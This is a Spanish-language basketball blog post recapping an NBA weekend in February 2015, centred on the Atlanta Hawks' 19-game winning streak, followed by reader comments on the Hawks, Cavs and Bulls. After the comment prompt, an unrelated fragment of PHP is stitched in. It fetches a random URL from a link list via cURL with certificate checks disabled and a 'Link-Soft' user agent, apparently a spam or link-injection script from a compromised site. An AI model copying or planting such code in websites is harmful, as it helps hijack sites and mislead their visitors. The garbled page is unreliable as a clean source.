Informe Fin de semana: At19nta

02 de February de 2015 por TheDeerHunter

Os dejamos algo abandonados el viernes, sin el habitual post “findesemanero” para aglutinar vuestros comentarios. A pesar de ello, no nos lo habéis tenido en cuenta y contamos con vuestras valiosas aportaciones como siempre.

El viernes dos cuestiones encima de la mesa por encima de las demás.

DeMarcus Cousins al All Star por Bryant… pues creo que era sitio para Lillard”
Jose Luis

Poco que añadir a ello, y la otra cuestión…

“Sudando sangre los Atlanta Hawks consiguieron sumar su 18ª victoria seguida y son ya los mejores de la NBA .El calendario que les viene no es que sea muy sencillo precisamente pero es conveniente situar históricamente esta racha por lo que pueda venir: http://en.wikipedia.org/wiki/List_of_National_Basketball_Association_longest_winning_streaks” – Ruxixón

atlhawks

El sorprendente tropiezo de los Warriors en Salt Lake City (con gran actuación de Rudy Gobert, por cierto, que os lee) dejó la puerta abierta al cambio de líder después de tantas semanas. El mejor equipo del momento no desaprovechó la oportunidad y se llevó un triunfo sufrido pero de mucho crédito. Como dijisteis se esperaba reivindicación de Lillard pero fue Lamarcus Aldridge el que ofreció su enésima clase magistral y fue el mejor hombre de la jornada y “mayor esfuerzo en vano” ante la tremenda pegada colectiva de los Hawks.

No fue el único tropiezo el de los Warriors. Los Clippers, cuando lo tenían todo a favor para encaramarse al top4 del Oeste, dieron la de arena perdiendo en New Orleans a pesar de la baja de Mr Cejota. Los Pelicans demostraron esta vez que son un equipo algo más serio de lo que quieren admitir los incondicionales de AD. Por su parte, los Bulls volvieron a perder en Phoenix.

“Después de las derrotas ante Atlanta y Cleveland han jugado 6 partidos, con victorias ante SA, Dallas y GSW, y derrotas ante Miami, LA y anoche Phoenix . Las dos últimas derrotas coinciden con un mejor Jimmy Butler y un mejor Joakim Noah.” – Nacho

Con su 9ª victoria consecutiva, ésta ante Kings, los Cavs les hacen sentir el aliento en el cogote a los Toritos. Vimos, además, victorias de Mavs ante Heat, a pesar de la nueva exhibición de Whiteside (y con Charlie Villanueva de primera espada, OMG!!!), la victoria en la prórroga de los Raptors en Brooklyn a pesar del inmeso partido de Jack&Lopez (parece el nombre de una tienda de ropa, vaya), la de los Rockets en Boston con Donatas Motiejunas como mejor hombre y la intrascendente de los Sixers sobre los Wolves.

El sábado vimos la 19ª seguida de los Hawks, mucho más apurada de lo que se esperaba contra Sixers, y la 10ª de los Cavs en Minneapolis. La visita de Kevin Love a sus antiguos seguidores resultó de lo más hostil.

LeBron James desperezó a los Cavaliers en el último cuarto (30-11 para Cavs) para ganar el partido. Parece mentira que un rookie pueda aguantar la comparación con LeBron, pero Andrew Wiggins no desmereció para nada con 33 puntos.” – Ruxixón

Hubo otro reencuentro hostil, el de Josh Smith en Detroit. Éste en cambio se saldó con vendetta del equipo agraviado.

Los Grizzlies dejaron bastante tocados a los Thunder, dejando en 74 puntos al mejor anotador del mundo y sus compañeros. Por suerte para ellos, los Warriors no fallaron ante Suns y los Clippers doblegaron a los Spurs con un descomunal Blake Griffin. Los angelinos escalaron hasta la 3ª plaza gracias a la derrota ya comentada de Houston y al tropezón de los Blazers en Milwaukee.

De la conferencia Este hay que hablar de otra meritoria victoria de Toronto en Washington, a pesar de que John Wall acarició el triple doble, y la gran victoria de Charlotte en Denver. Los avispones, como comentabais, se han metido en zona Playoffs a costa de unos Nets en recesión.

Cerrando el sábado, los Mavs ganaron fácil en Florida pese a que Jefferson dejó a Rondo K.O., y los Kings rompieron su racha de derrotas en Indianapolis.

Para el domingo, la NBA reservó sus mejores bazas ante la gran cita del football. En el Super Bowl Sunday únicamente se disputaron dos partidos, que sirvieron para persenciar un nuevo capítulo de ese fascinante fenómeno que ha resultado ser Hassan Whiteside, esencial en la victoria de los Heat en Boston (83-75), y para que los Knicks se diesen una alegría (y van unas cuantas últimamente) a costa de unos Lakers en los que sólo Jordan Clarkson dejó motivos para el optimismo.

De regalo, los mejores mates de la semana:

Comenta

8 comentarios a esta entrada

  1. oli dice:
    #1

    Pues lo van tener muy dificil los hawks para ampliar la racha de victorias con el calendario de esta semana: pelicans como visitante, reciben a los wizards y warriors y cierran la semana visitando Memphis yo lo veo muy dificil que ganen los 4 sobretodo el de memphis, vosotros os lo jugariais a que ganan los 4?? Y si lo hacen que techo les ponemos??

      Citar

  2. Futurman dice:
    #2

    El techo es el anillo. No se si ampliarán la racha o no, pero son el mejor equipo de la competición y eso con lesiones y cansancio a las espaldas.

      Citar

  3. oli dice:
    #3

    Puff yo anillo no creo que lleguen, al final casi todos los campeones tienen a una estrella, en los últimos años solo detroit eran grandes jugadores pero ninguno era crack crack de la liga, de momento disfrutemos de esta temporada tan abierto y si me equivoco no me importarla porque juegan muy bien estos hawks

      Citar

  4. Futurman dice:
    #4

    San Antonio ganó el año pasado sin una “estrella”: Duncan ya no es diferencial y Parker y Ginobili aunque buenos están subyugados al sistema colectivo de Pops y Leonard ganó el MVP siendo el pegamento. Siendo todos buenos ganaron por el juego en equipo y no por un Durant o Kobe que arrasase con todo.

      Citar

  5. Larry Bird 33 dice:
    #5

    Mi pronóstico de como se clasificarán en el este para los PO es el siguiente: 1.- Atlanta 2.- Cavs 3.- Raptors 4.- Wizards 5.- Bulls 6.- Bucks 7.- Hornets 8.- Heat con dudas entre el 3 y 4 puesto con Raptors y Wizards y en el 8 esperando el “milagro” de los Pistons (esto más bien lo deseo) Por tanto, personalmente, a Atlanta lo veo como semifinalista ya que los Wizards creo que en PO les ganarán (The Truth es un perro viejo, competidor como pocos y en PO creo que dará un paso adelante) a no ser que tengan “suerte” y les toquen los Raptors en semis donde creo que tendrían ventaja ya que ninguno de los dos equipos cuenta con una estrella que de verdad sepa lo que es jugar unos PO. De todas formas el finalista de la NBA por este lado del cuadro pienso que serán los Cavs que parece que ya carburan y Lebron ha demostrado que sigue siendo el verdadero MVP de la liga.

      Citar

  6. Larry Bird 33 dice:
    #6

    Por cierto los que me tienen intrigado son los Bulls, ¿qué pensáis que les está sucediendo? ¿Mala forma física? ¿Falta de entendimiento? Es que tienen la mejor plantilla que han tenido en años y tampoco es que hayan tenido muy muy mala suerte con las lesiones salvo Dunleavy y Noah que parece que está tocado y algunos partidos de Gibson pero nada excesivamente grave que justifique esta inconsistencia que están mostrando. ¿Creéis que es el momento de traspasar a Rose? Suponiendo que alguien lo quiera, aunque sería regalado con el objetivo de liberar esos 20 millones de salario para intentar fichar a un buen base y un tres o una estrella. No me gustaría ver a Rose con otra camiseta pero hay que reconocer que con ese contrato es una carga y no lo querría en mi equipo (por favor que a los iluminados de los Magic no les de por ficharlo). Dicho esto veo muy improbable que los Bulls se quieran desprender de su “MVP”.
    Un saludo!

      Citar

  7. Futurman dice:
    #7

    Los Bulls nacen y mueren con Rose: el proyecto tiene dos años, este y otro más; a partir de ahí o van bien o reconstruyen. Y si, el problema viene que el gran pilar defensivo (Noah) está fatal y Gibson mediocre. Si su defensa es regulera (porque en el perímetro defiende solo Butler) y tienen cortocircuitos en ataque… pues pasa lo que pasa.

      Citar

  8. Nacho dice:
    #8

    Futurman:
    Los Bulls nacen y mueren con Rose: el proyecto tiene dos años, este y otro más; a partir de ahí o van bien o reconstruyen. Y si, el problema viene que el gran pilar defensivo (Noah) está fatal y Gibson mediocre. Si su defensa es regulera (porque en el perímetro defiende solo Butler) y tienen cortocircuitos en ataque… pues pasa lo que pasa.

    Y los problemas de saber adaptarse de Thibodeau. Aún así no creo que nadie quiera cruzarse con ellos. Sólo veo rivales a Atlanta y a esta versión de los Cavs

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>